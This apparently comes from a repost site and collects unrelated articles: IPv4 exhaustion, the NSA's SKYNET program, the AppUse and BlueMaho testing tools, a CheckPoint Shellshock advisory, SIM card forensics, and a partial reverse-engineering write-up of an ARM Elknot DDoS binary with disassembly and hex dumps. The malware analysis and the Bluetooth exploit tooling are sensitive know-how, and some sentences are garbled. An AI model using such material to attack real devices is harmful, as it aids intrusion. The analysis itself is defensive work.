It’s official: North America out of new IPv4 addresses

Remember how, a decade ago, we told you that the Internet was running out of IPv4 addresses? Well, it took a while, but that day is here now: Asia, Europe, and Latin America have been parceling out scraps for a year or more, and now the ARIN wait list is here for the US, Canada, and numerous North Atlantic and Caribbean islands. Only organizations in Africa can still get IPv4 addresses as needed. The good news is that IPv6 seems to be picking up the slack.

ARIN, the American Registry for Internet Numbers, has now activated its “IPv4 Unmet Requests Policy.” Until now, organizations in the ARIN region were able to get IPv4 addresses as needed, but yesterday, ARIN was no longer in the position to fulfill qualifying requests. As a result, ISPs that come to ARIN for IPv4 address space have three choices: they can take a smaller block (ARIN currently still has a limited supply of blocks of 512 and 256 addresses), they can go on the wait list in the hopes that a block of the desired size will become available at some point in the future, or they can transfer buy addresses from an organization that has more than it needs.

“If you take a smaller block, you can’t come back for more address space for 90 days,” John Curran, CEO of ARIN, told Ars. “We currently have nearly 500 small blocks remaining, but we handle 300 to 400 requests per month, [so] those remaining small blocks are going to last between two and four weeks.”

Doesn’t this allow for strategic behavior, where each ISP tries to request a block slightly smaller than the requests already on the wait list? “The wait list is a last resort as very little address space is returned to ARIN,” Curran said. “Trying to figure out how to game the wait list is not strategic. Trying to figure out how to use IPv6 for new customers is strategic.”

“ISPs will have to get used to the transfer market. If you need IPv4 addresses, go there,” Curran continued. “But I’m not sure how long a market is going to be around. Seven billion people with smartphones and home connections, a connection at work, then add Google, YouTube, Facebook, Bing… Four billion addresses, even with a perfectly working market, isn’t going to work in the future.”

IPv4 address markets

We spoke to Janine Goodman, vice president of Avenue4, a broker of IPv4 addresses, about what to expect in the short term.

“IPv6 is going to happen, that’s the direction it’s going,” she said. “But it’s going to take a while. Organizations are not ready to turn to IPv6 tomorrow; this will take a few years. A transfer market allows for the transition from IPv4 to IPv6 in a responsible way, not a panicked way.”

“The price for blocks of IPv4 addresses of 65,536 addresses (a /16) or smaller is about $7 to $8 per address in the ARIN region. In other regions, which have fewer addresses out there, the price tends to be a little higher,” Goodman said. “We expect the IPv4 market to be around for at least three to five years. During that time, the price per address will likely go up and then finally come back down as IPv6 is being widely deployed.”

Goodman stressed that buyers of addresses should make sure they are “clean” and have a known history. There have been reports of address sales where the addresses turned out to be in ongoing use after completion of the transaction.

ARIN CEO Curran also suggested that buyers do their due diligence. “With a car, the car and the registration are two different things. Not so with IP addresses: the registration in the whois database is the only thing,” he said. However, ARIN will only modify its whois records if the buyer of the addresses has a documented need for the amount of address space in question. As such, prospective buyers can pre-qualify with ARIN and then go out and buy the address space that covers their documented needs for the next two years, or they can find a seller of address space first and then come to ARIN to make sure they qualify.

Bring on the IPv6!

The Internet Engineering Task Force (IETF) saw the eventual depletion of IP addresses looming in the early 1990s, so they set out to solve the problem and came up with a new version of the Internet Protocol. The old IP has version number 4; the new version is 6. IPv6 increases the length of IP addresses to no fewer than 128 bits—sort of like increasing phone numbers from 10 to 40 digits. As a result, the number of available IPv6 addresses is, for all practical purposes, unlimited.

The trouble is that, of course, old systems can only handle the IPv4 with its 32-bit addresses. That problem has pretty much been solved in the intermediate decade, and today virtually all operating systems can handle 128-bit IPv6 addresses—although some applications can’t or don’t handle them properly.

The main issue remaining is that most networks simply haven’t enabled IPv6 yet. Although turning on IPv6 is not as hard as some people think, it’s not entirely trivial either in larger networks. Internet Service Providers, routers, firewalls, load balancers, and DNS servers must all be IPv6-ready and be reconfigured. And then there are all those little (and not so little) homegrown applications that keep businesses running. In almost all cases, a new IPv6 numbering plan is required, and DHCP works differently with IPv6 than with IPv4.

So for a long time, the number of Internet users who had IPv6 connectivity in addition to IPv4 connectivity, as well as the fraction of total Internet traffic that is IPv6, were rounding errors. Google’s statistics showed that only a few tenths of a percent of its users from 2009 to 2011 had IPv6 connectivity; that number reached one percent only at the end of 2012. A year ago, it hit 3.5 percent. Today, it stands between 6.5 (weekdays) and 7.5 percent (weekends).

Things get more interesting as we look at Google’s stats for individual countries. In early 2013, the US and Belgium weren’t notable players in the IPv6 adoption game, at 2.17 and 0.04 percent, respectively. Today, Belgium is the world leader at nearly 35 percent, and the US is third just behind Switzerland (both have about 21 percent adoption). According to Akamai’s numbers, seven countries now have IPv6 adoption rates above ten percent: Belgium, Switzerland, the US, Peru, Germany, Luxembourg, and Portugal—Greece will be the eighth very soon. Sixteen countries have more than five percent IPv6 deployment, and 32 countries have at least one percent.

Remarkably, neighboring countries may differ by an order of magnitude. The US is at nearly 21 percent, but Canada has only 0.5 percent IPv6 users. Belgium has nearly 35 percent, but the Netherlands has just three percent. Ireland is at 2.4 percent; the UK is at 0.2 percent.

Per-country IPv6 deployment

Per-country IPv6 deployment

Don’t be too alarmed by the colors of Google’s IPv6 deployment map. White means no IPv6, while darker shades of green mean more IPv6. Red is bad, as it not only indicates very little IPv6 but also that IPv6 is slower than IPv4. Orange means that there is significant IPv6 deployment, but IPv6 connectivity is slower than IPv4 connectivity. However, IPv6 packets often take just two hundredths of a second longer than IPv4 packets, which isn’t ideal but not as alarming as the orange coloring suggests.

However, there are also places, such as Belgium or Russia, where on average IPv6 is actually faster than IPv4. One explanation for this could be that “good” ISPs also tend to be the ones that have IPv6 deployed. Routing paths over worse-performing ISPs that are available to IPv4 packets aren’t available to IPv6 packets, so those have no other choice than to flow through better performing ISPs. But in places where IPv6 deployment is lacking, there’s always the risk that the ISP providing the shortest path doesn’t run IPv6, so IPv6 packets need to follow a longer path, slowing down communication.

So it looks like a future where the Internet remains largely IPv4-only, with more and more invasive translation devices that let more and more users share a single IPv4 address, is not the most likely outcome. We now know that getting a tenth of a country’s Internet users on IPv6 within a year is doable. And as someone smart recently said about ISPs adopting IPv6, referring to Metcalfe’s Law, “If everyone is doing it, you have to do it, too.”

 

 

Credit: 

Skynet actually exists!!! Skynet is a top secret program of NSA

National Security Agency (NSA) actually has a real program named Skynet

Skynet, which was an evil military computer system that launches war on human race in the Terminator movies franchise, it is learnt that NSA has a program with the same name.

As per The Intercept reports, the NSA does have a program called Skynet. However, it has a less lethal but legally dubious aims. This one is a surveillance program that makes use of phone metadata to record the call activities and location of doubtful terrorists. An Al Jazeera journalist reportedly became one of its victims after he was kept on a terrorist watch list.

Chief bureau of Al Jazeera’s Islamabad office, Ahmad Muaffaq Zaidan got traced by Skynet after he was recognized by US intelligence as a possible Al Qaeda member and given a watch list number. Zaidan, a Syrian national has taken a number of exclusive interviews with senior Al Qaeda leaders, including Osama bin Laden himself.

According to a 2012 government presentation The Intercept obtained from Edward Snowden says that Skynet makes use of phone location and call metadata from bulk phone call records to identify fishy patterns in their communication habits and physical movements of the suspects.

Says Wired:

The presentation indicates that SKYNET looks for terrorist connections based on questions such as “who has traveled from Peshawar to Faisalabad or Lahore (and back) in the past month? Who does the traveler call when he arrives?” It also looks for suspicious behaviors such as someone who engages in “excessive SIM or handset swapping” or receives “incoming calls only.” The goal is to identify people who move around in a pattern similar to Al Qaeda couriers who are used to pass communication and intelligence between the group’s senior leaders.

In addition to its misleading name, SKYNET has a few problems though. It happened to misidentify an Al-Jazeera reporter as a member of al-Qaida based on the criteria mentioned above. (It seems that the journalists meeting with sources and terrorists meeting with terrorist group leaders move in patterns that look same to the computer.) This misidentification would be disturbing even if the government did not make use of such metadata to make life-and-death decisions about who to kill with drone strikes. However, it does.

The NSA one should note has a second program too that is very similar to the Terminator‘s Skynet. As revealed by Edward Snowden in an interview with WIRED and James Bamford last year, this one is called MonsterMind. Like the film version of Skynet, MonsterMind is a defense surveillance system that would immediately and independently disarm foreign cyberattacks against the US, and could be used to launch retaliatory strikes as well. Algorithms under this program would remove massive repositories of metadata and examine it to recognize normal network traffic from anomalous or malicious traffic. Equipped with this knowledge, the NSA could immediately and autonomously find, and block, a foreign threat.

Snowden also stated that MonsterMind could one day be designed to automatically return fire without human interference against an attacker. Because an attacker could twist malicious code to keep away from detection, a counterstrike would be more successful in neutralizing future attacks. Sounds a lot like Skynet. However, there is no news from the NSA on why the iconic film name was not used for its real-world Skynet.

 

If you asked me, it seems quite serious guys who adhesives in the program:

Arnold Schwarzenegger, who later became governor of California.

 

 

 

Credit:  Kavita Iyer

AppUse – Android Pentest Platform Unified Standalone Environment

AppUse Virtual Machine, developed by AppSec Labs, is a unique (and free) system, a platform for mobile application security testing in the android environment, and it includes unique custom-made tools.

Faster & More Powerful
The system is a blessing to security teams, who from now on can easily perform security tests on Android applications. It was created as a virtual machine targeted for penetration testing teams who are interested in a convenient, personalized platform for android application security testing, for catching security problems and analysis of the application traffic.
Now, in order to test Android applications, all you will need is to download AppUse Virtual Machine, activate it, load your application and test it.

 

Easy to Use
There is no need for installation of simulators and testing tools, no need for SSL certificates of the proxy software, everything comes straight out of the box pre-installed and configured for an ideal user experience.
Security experts who have seen the machine were very excited, calling it the next ‘BackTrack’ (a famous system for testing security problems), specifically adjusted for Android application security testing.

 

AppUse VM closes gaps in the world of security, now there is a special and customized testing environment for Android applications; an environment like this has not been available until today, certainly not with the rich format offered today by AppUse VM.
This machine is intended for the daily use of security testers everywhere for Android applications, and is a must-have tool for any security person.

 

We at AppSec Labs do not stagnate, specifically at a time in which so many cyber attacks take place, we consider it our duty to assist the public and enable quick and effective security testing.

 

As a part of AppSec Labs’ policy to promote application security in general, and specifically mobile application security, AppUse is offered as a free download on our website, in order to share the knowledge, experience and investment with the data security community.

 

Features
  • New Application Data Section
  •  Tree-view of the application’s folder/file structure
  •  Ability to pull files
  •  Ability to view files
  •  Ability to edit files
  •  Ability to extract databases
  •  Dynamic proxy managed via the Dashboard
  •  New application-reversing features
  •  Updated ReFrameworker tool
  •  Dynamic indicator for Android device status
  •  Bugs and functionality fixes

 

 

Credit:  kitploit

BlueMaho Project – Bluetooth Security Testing Suite

BlueMaho is GUI-shell (interface) for a suite of tools best used for Bluetooth security testing. It is freeware, opensource, written on python, uses wxPython. It can be used for testing BT-devices for known vulnerabilities and major thing to do – testing to find unknown vulns. Also it can form nice statistics.

I did get interested in Bluetooth for a while and the security implications of a personal area network protocol which includes discovery/broadcast etc. I ended up only posting one article at the time though which was about Haraldscan – BlueTooth Discovery Scanner.

BlueMaho Project - Bluetooth Security Testing Suite

I have a bunch more Bluetooth related resources to share though, so I’ll be putting them out from time to time. Some (like this) aren’t particularly up to date, but give you a great base to start with and play around.

Features

  • Scan for devices, show advanced info, SDP records, vendor etc
  • Track devices – show where and how much times device was seen, its name changes
  • Loop scan – it can scan all time, showing you online devices
  • Alerts with sound if new device found
  • on_new_device – you can spacify what command should it run when it founds new device
  • It can use separate dongles – one for scaning (loop scan) and one for running tools or exploits
  • Send files
  • Change name, class, mode, BD_ADDR of local HCI devices
  • Save results in database
  • Form nice statistics (uniq devices by day/hour, vendors, services etc)
  • Test remote device for known vulnerabilities (see exploits for more details)
  • Test remote device for unknown vulnerabilities (see tools for more details)
  • Themes! you can customize it

Requirements

The main requirements are:

  • OS (tested with Debian 4.0 Etch / 2.6.18)
  • Python 2.4
  • wxPython
  • BlueZ

You can download BlueMaho here:

bluemaho_v090417.tgz

Or read more here.

 

 

Credit: darknet

CheckPoint’s Firewall systems at risk of Shellshock Bash attacks

Companies should check whether their CheckPoint system’s has the widespread vulnerability

The Shellshock Bash bug was found in a typical CheckPoint system’s Admin panel (WebUI), opening up the possibility that many more of the business information security systems could be vulnerable if attacked.

The vulnerability exist at the CheckPoint firewall system’s administrative WebUI, DHCP component and more firewall’s system modules and affected all the CheckPoint Firewall’s versions of the Gaia, SecurePlatform, SecurePlatform 2.6, IPSO 6.2 and Gaia Embedded platforms and all appliance lines: 2012 models, Smart-1, Threat Emulation, UTM-1, Power-1

The bug uncovered this week in a widely used component of Linux, Unix and Mac OS X was found in the largest firewall vendor’s – CheckPoint Admin panel. Alexey Baltacov, Network Security Architect at Frogteam|Security, said Sunday “Because many vendors use similar servers, the vulnerability is likely widespread”.

Baltacov declined to expose the vulnerable path in the system but also said:

“I’m pretty sure that there are a bunch of them (vendors), if not a lot of them, that you can be also exploitable”.

 

A CheckPoint OS platform and the Admin panel, which often runs on Unix or Linux, is the main component of a CheckPoint Firewall system for managing and configuring the firewall hardware in the organization.

Many CheckPoint Firewalls hardware and servers run GNU Bash, which is the component with the critical flaw.

Bash, which stands for Bourne Again Shell, is the default command shell for the operating system.
The bug lets an attacker trick Bash into executing malicious command code by sending it via the Common Gateway Interface, an underlying component of the CheckPoint firewall’s administrative interface.

Eran Goldstein, Senior Cyber security and malware researcher at ZIMPERIUM said:

“Depending on the architecture of the firewall system, an attacker could manage and reconfigure all firewall hardware and  servers and gain access to a company’s internal network. Even if he you don’t have the username and password (for the Firewall server’s admin panel), he still can exploit the vulnerability. Also, once inside the firewall system’s admin panel, an hacker could infect components inside the organization network and IT environment.”

 

Security researchers reported Thursday that hackers were trying to exploit Shellshock in Web servers. On Friday, firewall vendor Incapsula reported that in a 12-hour period, it recorded 725 attacks per hour against a total of 1,800 domains.

“This is pretty high for a single vulnerability,” Tim Matthews, vice president of marketing at Incapsula, said.

The attacks originated from 400 unique IP addresses. More than half of the attacks started from China and the U.S.

In general, the attackers were running automated scripts from compromised servers in existing botnets in an attempt to add more systems to the network. Several botnet operators were using re-purposed distributed denial of service (DDoS) bots in an attempt to exploit Shellshock.

Checkpoint respond in the company official website:

The OS WebUI may be susceptible to environment changes caused by the Shellshock exploit. At the time of Sep 2014, Check Point is not aware of any exploit on its solutions.

 

From CheckPoint website:

A Hotfix package is currently available for R75.40, R75.40VS, R75.45, R75.46, R75.47, R76, R77, R77.10, and R77.20.

This Hotfix package is relevant to the main appliances lines: 2012 models, Smart-1, Threat Emulation, UTM-1, Power-1. For other appliances, see the relevant section below.

For other versions – R65, R70.20, R71.20, R75.10, R75.20 and R75.30, use the Early Availability (EA) solution below. A General Availability (GA) solution will be published within the week of September 29th.

 

 

 

Credit: Frogteam|Security

SIM Card Forensics

The SIM (subscriber identity module) is a fundamental component of cellular phones. It’s also known as an integrated circuit card (ICC), which is a microcontroller-based access module. It is a physical entity and can be either a subscriber identity module (SIM) or a universal integrated circuit card (UICC). A SIM can be removed from a cellular handset and inserted into another; it allows users to port identity, personal information, and service between devices. All cell phones are expected to incorporate some type of identity module eventually, in part because of this useful property. Basically, the ICC deployed for 2G networks was called a SIM and the UICC smart card running the universal subscriber identity module (USIM) application. The UICC card accepts only 3G universal mobile telecommunications service (UMTS) commands. USIMs are enhanced versions of present-day SIMs, containing backward-compatible information. A USIM has a unique feature in that it allows one phone to have multiple numbers. If the SIM and USIM application are running on the same UICC, then they cannot be working simultaneously.

The first SIM card was about the size of a credit card. As technology developed, the cell phone began to shrank in size and so did the SIM card. The mini-SIM card, which is about one-third the size of a credit card. But today we are using smartphones that use micro-SIM, which is smaller than mini-SIM. These SIM cards vary in size but all have the functionality for both the identification and authentication of the subscriber’s phone to its network and all contain storage for phone numbers, SMS, and other information, and allow for the creation of applications on the card itself.

Untitled

SIM Structure and File Systems

A SIM card contains a processor and operating system with between 16 and 256 KB of persistent, electronically erasable, programmable read-only memory (EEPROM). It also contains RAM (random access memory) and ROM (read-only memory). RAM controls the program execution flow and the ROM controls the operating system work flow, user authentication, data encryption algorithm, and other applications. The hierarchically organized file system of a SIM resides in persistent memory and stores data as names and phone number entries, text messages, and network service settings. Depending on the phone used, some information on the SIM may coexist in the memory of the phone. Alternatively, information may reside entirely in the memory of the phone instead of available memory on the SIM.

The hierarchical file system resides in EEPROM. The file system consists of three types of files: master file (MF), dedicated files, and elementary files. The master file is the root of the file system. Dedicated files are the subordinate directories of master files. Elementary files contain various types of data, structured as either a sequence of data bytes, a sequence of fixed-size records, or a fixed set of fixed-size records used cyclically.

1

As can be seen in the above figure, dedicated files are subordinate directories under the MF, their contents and functions being defined by the GSM11.11 standards. Three are usually present: DF (DCS1800), DF (GSM), and DF (Telecom). Also present under the MF are EFs (ICCID). Subordinate to each of the DFs are supporting EFs, which contain the actual data. The EFs under DF (DCS1800) and DF (GSM) contain network-related information and the EFs under DF (Telecom) contain the service-related information.

All the files have headers, but only EFs contain data. The first byte of every header identifies the file type and the header contains the information related to the structure of the files. The body of an EF contains information related to the application. Files can be either administrative- or application-specific and access to stored data is controlled by the operating system.

Security in SIM

SIM cards have built-in security features. The three file types, MF, DF, and EF, contain the security attributes. These security features filter every execution and allow only those with proper authorization to access the requested functionality. There are different levels of access conditions in DF and EF files. They are:

  • Always—This condition allows to access files without any restrictions.
  • Card holder verification 1 (CHV1)—This condition allows access to files after successful verification of the user’s PIN or if PIN verification is disabled.
  • Card holder verification 2 (CHV2)—This condition allows access to files after successful verification of the user’s PIN2 or if the PIN2 verification is disabled.
  • Administrative (ADM)—The card issuer who provides SIM to the subscriber can access only after prescribed requirements for administrative access are fulfilled.
  • Never (NEV)—Access of the file over the SIM/ME interface is forbidden.

The SIM operating system controls access to an element of the file system based on its access condition and the type of action being attempted. The operating system allows only limited number of attempts, usually three, to enter the correct CHV before further attempts are blocked. For unblocking, it requires a PUK code, called the PIN unblocking key, which resets the CHV and attempt counter. If the subscriber is known, then the unblock CHV1/CHV2 can be easily provided by the service provider.

Sensitive Data in SIM

1

The SIM card contains sensitive information about the subscriber. Data such as contact lists and messages can be stored in SIM. SIM cards themselves contain a repository of data and information, some of which is listed below:

  • Integrated circuit card identifier (ICCID)
  • International mobile subscriber identity (IMSI)
  • Service provider name (SPN)
  • Mobile country code (MCC)
  • Mobile network code (MNC)
  • Mobile subscriber identification number (MSIN)
  • Mobile station international subscriber directory number (MSISDN)
  • Abbreviated dialing numbers (ADN)
  • Last dialed numbers (LDN)
  • Short message service (SMS)
  • Language preference (LP)
  • Card holder verification (CHV1 and CHV2)
  • Ciphering key (Kc)
  • Ciphering key sequence number
  • Emergency call code
  • Fixed dialing numbers (FDN)
  • Local area identity (LAI)
  • Own dialing number
  • Temporary mobile subscriber identity (TMSI)
  • Routing area identifier (RIA) network code
  • Service dialing numbers (SDNs)

These data have forensics value and can be scattered from EF files. Now we will discuss some of these data.

A. Service Related Information

ICCID: The integrated circuit card identification is a unique numeric identifier for the SIM that can be up to 20 digits long. It consists of an industry identifier prefix (89 for telecommunications), followed by a country code, an issuer identifier number, and an individual account identification number.
Twenty-digit ICCIDs have an additional “checksum” digit. One example of the interpretation of a hypothetical nineteen digit ICCID (89 310 410 10 654378930 1) is shown below.

  • Issuer identification number (IIN) is variable in length up to a maximum of seven digits:

The first two digits are fixed and make up the Industry Identifier. “89″ refers to the telecommunications industry.

-The next two or three digits refer to the mobile country code (MCC) as defined by ITU-T recommendation E.164. “310″ refers to the United States.

-The next one to four digits refer to the mobile network code (MNC). This is a fixed number for a country or world zone. “410″ refers to the operator, AT&T Mobility.

-The next two digits, “10,” pertain to the home location register.

  • Individual account information is variable in length:

The next nine digits, “654378930,” represent the individual account identification number. Every number under one IIN has the same number of digits.

  • Check digit—the last digit, “1,” is computed from the other 18 digits using the Luhn algorithm.

IMSI: The international mobile subscriber identity
is a unique 15-digit number provided to the subscriber. It has a similar structure to ICCID and consists of the MCC, MNC, and MSIN. An example of interpreting a hypothetical 15-digit IMSI (302 720 123456789) is shown below:

  • MCC—The first three digits identify the country. “302″ refers to Canada.
  • MNC—The next two (European Standard) or three digits (North American Standard) identify the operator. “720″ refers to Rogers Communications.
  • MSIN—The next nine digits, “123456789,” identify the mobile unit within a carrier’s GSM network

MSISDN—The Mobile Station International Subscriber Directory Number is intended to convey the telephone number assigned to the subscriber for receiving calls on the phone. An example of the MSISDN format is shown below:

  • CC can be up to 3 digits.
  • NDC usually 2 or 3 digits.
  • SN can be up to a maximum 10 digits.

B. Phonebook and Call Information

1. Abbreviated dialing numbers (ADN)—Any number and name dialed by the subscriber is saved by the ADN EF. The type of number and numbering plan identification is also maintained under this. This function works on the subscriber’s commonly dialed numbers. The ADN cannot be changed by the service provider and they can be attributed to the user of the phone. Most SIMs provide 100 slots for ADN entries.

2. Fixed dialing numbers (FDN)—The FDN EF works similar to the ADN because it involves contact numbers and names. With this function, the user doesn’t have to dial numbers; by pressing any number pad of the phone, he can access to the contact number.

3. Last number dialed (LND)—The LND EF contains the number most recently dialed by the subscriber. The number and name associated with that number is stored in this entry. Depending upon the phone, it is also conceivable that the information may be stored in the handset and not on the SIM. Any numbers that may be present can provide valuable information to an investigator.

Untitled

XML Phonebook Entry

C. Messaging Information—Messaging is a communication medium by which text is entered on one cell phone and delivered via the mobile phone network. The short message service contains texts and associated parameters for the message. SMS entries contain other information besides the text itself, such as the time an incoming message was sent, as recorded by the mobile phone network, the sender’s phone number, the SMS center address, and the status of the entry. An SMS is limited to either 160 characters (Latin alphabet) or 70 characters (for other alphabets). Longer messages are broken down by the sending phone and reassembled by the receiving phone.

Tools for SIM Forensics

To perform forensic investigation on a SIM card, it has to be removed from the cell phone and connect to a SIM card reader. The original data of SIM card is preserved by the elimination of write requests to the SIM during its analysis. Then we calculate the HASH value of the data; hashing is used for checking the integrity of the data, that is, whether it has changed or not. There are lots of forensic tools are available but all tools are not able to extract data from every type of cell phone and SIM card. Now we will discuss about some famous tools:

Encase Smartphone Examiner: This tool is specifically designed for gathering data from smartphones and tablets such as iPhone, iPad, etc. It can capture evidence from devices that use the Apple iOS, HP Palm OS, Windows Mobile OS, Google Android OS, or RIM Blackberry OS. It can acquire data from Blackberry and iTunes backup files as well as a multitude of SD cards. The evidence can be seamlessly integrated into EnCase Forensic.

1

MOBILedit! Forensic: This tool can analyze phones via Bluetooth, IrDA, or cable connection; it analyzes SIMs through SIM readers and can read deleted messages from the SIM card.

a

pySIM: A SIM card management tool capable of creating, editing, deleting, and performing backup and restore operations on the SIM phonebook and SMS records.

Untitled

AccessData Mobile Phone Examiner (MPE) Plus: This tool supports for than 7000 phones including iOS , Android , Blackberry, Windows Mobile, and Chinese devices and can be purchased as hardware with a SIM card reader and data cables. File systems are immediately viewable and can be parsed in MPE+ to locate lock code, EXIF, and any data contained in the mobile phone’s file system.

1

SIMpull: SIMpull is a powerful tool, a SIM card acquisition application that allows you to acquire the entire contents of a SIM card. This capability includes the retrieval of deleted SMS messages, a feature not available on many other commercial SIM card acquisition programs. SIMpull first determines if the card is either a GSM SIM or 3G USIM, then performs a logical acquisition of all files defined in either ETSI TS 151.011 (GSM) or ETSI TS 131.102 (USIM) standards.

1

As can be seen in above figure, by using the SIMpull application we can see the information of SMS such as a SMS text and its length, the SMS sender’s number information, service center information, etc.

References

http://www.forensicmag.com/articles/2011/04/sim-forensics-part-1

http://www.infosecinstitute.com/courses/mobile-computer-forensics.html

https://www.visualanalysis.com/ProductsVA_SIMpull.aspx

http://csrc.nist.gov/groups/SNS/mobile_security/documents/mobile_forensics/Reference%20Mat-final-a.pdf

CREDIT:  Rohit Shaw – eforensicsmag

MMD-0026-2014 – Router Malware Warning | Reversing an ARM arch ELF Elknot (China DDoS malware)

The background

It is one of our active project to monitor the China origin ELF DDoS’er malware threat. The growth is very rapid nowadays, MMD detected 5 variants is active under almost 15 panels scattered in China network. I am quite active in supporting the team members of this project, so recently almost everyday I reverse ELF files between 5-10 binaries. They are not aiming servers with x32 or x64 architecture but the router devices that runs on Linux too. In some cases I found the FreeBSD variant.

In this story I faced an ARM architecture binary, which I found it interesting so I decided to share it here. The reason is because, practically: it was designed to work in ARM router with minimizing a well-known Linux/Elknot functions/features, that I previously posted in —>[-1-] [-2-] [-3-] [-4-] [-5-] [-6-], to specifically infect ARM (router) devices, and this binary is trying to convince that it is a WindowsHelp binary 😀 , and ,specifically: from my reverse engineering point of view, ARM & “thumb” assembly are interesting.
Why I know it is aiming for router is because, the way to use internet to connect directly to remote global IP, the method used to grab data using specific location in the embedded device, and the trace of sources used during the compilation of the malware itself.

The malware

As usual, China actor(s) serves their malware binary under “specific panel”, and this binary is spotted among with other Linux/Elknots malware. So as you can see it was served from Sept 10th and is having 4 downloads (including me, one time)

The file looks like this:

1
2
3
4
5
6
$ ls -alF 1
-rwxr--r--  1 mmd  mmd  165,176 Sep 10 10:21 1
$ md5 1
MD5 (1) = 0bb68bd65d94f61b7b20117b99d8526c
$ file 1
1: ELF 32-bit LSB executable, ARM, version 1 (GNU/Linux), statically linked, stripped

Well, we know is an ARM binary, but I need more information, so I check the ELF composition:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
  Entry point address:  "0x2f118"
  Start of program headers: "52" (bytes into file)
  Start of section headers: "0" (bytes into file)
  Flags: "0x4000002", has entry point, "Version4 EABI"
  Size of this header: "52" (bytes)
  Size of program headers: "32" (bytes)
  Number of program headers: "2"
  Size of section headers: "40" (bytes)
  Number of section headers: "0"
  Section header string table index: "0"
Program Headers:
  Type     Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  LOAD     "0x000000 0x00008000 0x00008000 0x282b1 0x282b1 R E 0x8000"
  LOAD     "0x000c24 0x000d0c24 0x000d0c24 0x00000 0x00000 RW  0x8000"

Now it’s time for calculating the data, we know the size and we see the each LOAD headers size which is just unfit, further, I don’t see any section (either dynamic or static) nor relocation data that I can expect from an ARM ELF (they should have more symbols), which is strange. This a sign of protection, someone want to hide something, in the end that person is hiding EVERYTHING which ending up to be very suspicious 🙂 – So the binary could be packed or encrypted protection, we have many possibility.

Packer

Let’s check, I went to the EP point (0x2f118) and start to do the stuff I usually do, with noted..we have to be very patient with the ARM or THUMB assembly since they have larger steps for simple operation than Intel processor.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
;-- entry0:
0x0002f118  adr     r12, off_2f104
0x0002f11c  ldmia   r12, {r1,r2,r10,r11,lr}
0x0002f120  add     r10, r10, r12
0x0002f124  add     r11, r11, r12
0x0002f128  mov     r0, r2
0x0002f12c  sub     r9, r12, r1
0x0002f130  add     r1, r1, #0x1000
0x0002f134  mov     r3, #0
0x0002f138  stmfd   sp!, {r0-r3,lr}
0x0002f13c  mov     r2, #7
0x0002f140  ldr     r3, [r12,#0x10]
0x0002f144  mov     r5, #0
0x0002f148  mov     r4, 0xffffffff
0x0002f14c  orr     r3, r3, #0x10
0x0002f150  mov     r7, #0xc0
0x0002f154  svc     0
0x0002f158  cmn     r0, #0x1000
0x0002f15c  bcs     loc_0x02fbd0
  [...]

..following the registers value and in r1 we will find the value that can tell what is happening:

1
2
3
4
5
0x0002fbd0  mov  r2, #0x1e
0x0002fbd4  adr  r1, aprot_execprot_ ; ""PROT_EXEC|PROT_WRITE failed.\n""
0x0002fbd8  mov  r0, #2
0x0002fbdc  mov  r7, #4
0x0002fbe0  svc  0

This value may ring your bells too :). ok this ELF is protected, with/for what? I look from its DCB data from where it was called and clarifying the answer:

1
2
3
4
5
6
7
8
9
10
11
0x0002FBF0 aProt_execProt_ DCB "PROT_EXEC|PROT_WRITE failed.",0xA,0
0x0002FC0E                 DCB 0xA,0
0x0002FC10 aInfoThisFileIs DCB 0x24,"Info: This file is packed with the UPX executable packer http:/"
0x0002FC10                 DCB "/upx.sf.net ",0x24,0xA,0
0x0002FC5F aIdUpx3_91Copyr DCB 0x24,"Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. All Rights R"
0x0002FC5F                 DCB "eserved. ",0x24,0xA,0
0x0002FCAB                 DCB 0x0 ;; here goes the table..
0x0002FCAC                 DCD 0x9A8, 0x5F9, 0x500E, 0x6C00031A, 0x942C5302, 0x18D063CB
0x0002FCAC                 DCD 0x49382EE, 0xD185E779, 0x57399E2E, 0xD24C892F, 0x1003EA02
0x0002FCAC                 DCD 0x6A5A70C9, 0x2F701D6A, 0x6D0D9A7, 0xD2EC6754, 0x95ECE49
[...]                      [...]

Oh, silly me.. it is a UPX, but, is it common and not modded one? So I went back to check the hex snapshot, to confirm..

1
2
3
4
5
6
7
8
9
00000000  7f 45 4c 46 01 01 01 03  00 00 00 00 00 00 00 00  |.ELF............|
00000010  02 00 28 00 01 00 00 00  18 f1 02 00 34 00 00 00  |..(.........4...|
00000020  00 00 00 00 02 00 00 04  34 00 20 00 02 00 28 00  |........4.(.|
00000030  00 00 00 00 01 00 00 00  00 00 00 00 00 80 00 00  |................|
00000040  00 80 00 00 b1 82 02 00  b1 82 02 00 05 00 00 00  |................|
00000050  00 80 00 00 01 00 00 00  24 0c 00 00 24 0c 0d 00  |........$...$...|
00000060  24 0c 0d 00 00 00 00 00  00 00 00 00 06 00 00 00  |$...............|
00000070  00 80 00 00 93 cc 51 fc  55 50 58 21 b4 11 0d 17  |......Q.UPX!....|
00000080  00 00 00 00 58 64 08 00  58 64 08 00 d4 00 00 00  |....Xd..Xd......|

Since I know that some moronz is really watching this blog too. I don’t want to be specific on this, but from reading the hex above we can recognize the originality of this UPX, which it is. Otherwise you have patch it to depack, sample a way to depack the custom UPX is in here–>[LINK]. Further.. as this is the common UPX, and the “U” stands for universal & we can do “universal” solution too to unpack 🙂

1
549976 <-    165176   30.03%   linux/armel   unpacked.1

So now we have the bigger file size 😀
This time let’s check the composition again:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
00000000  7f 45 4c 46 01 01 01 00  00 00 00 00 00 00 00 00  |.ELF............|
00000010  02 00 28 00 01 00 00 00  10 81 00 00 34 00 00 00  |..(.........4...|
00000020  f8 5f 08 00 02 00 00 04  34 00 20 00 05 00 28 00  |._......4.(.|
00000030  1c 00 1b 00 01 00 00 70  5c bb 07 00 5c 3b 08 00  |.......p\...\;..|
00000040  5c 3b 08 00 00 09 00 00  00 09 00 00 04 00 00 00  |\;..............|
00000050  04 00 00 00 01 00 00 00  00 00 00 00 00 80 00 00  |................|
00000060  00 80 00 00 dc c4 07 00  dc c4 07 00 05 00 00 00  |................|
00000070  00 80 00 00 01 00 00 00  dc c4 07 00 dc c4 08 00  |................|
00000080  dc c4 08 00 4c 0a 00 00  48 47 04 00 06 00 00 00  |....L...HG......|
00000090  00 80 00 00 04 00 00 00  d4 00 00 00 d4 80 00 00  |................|
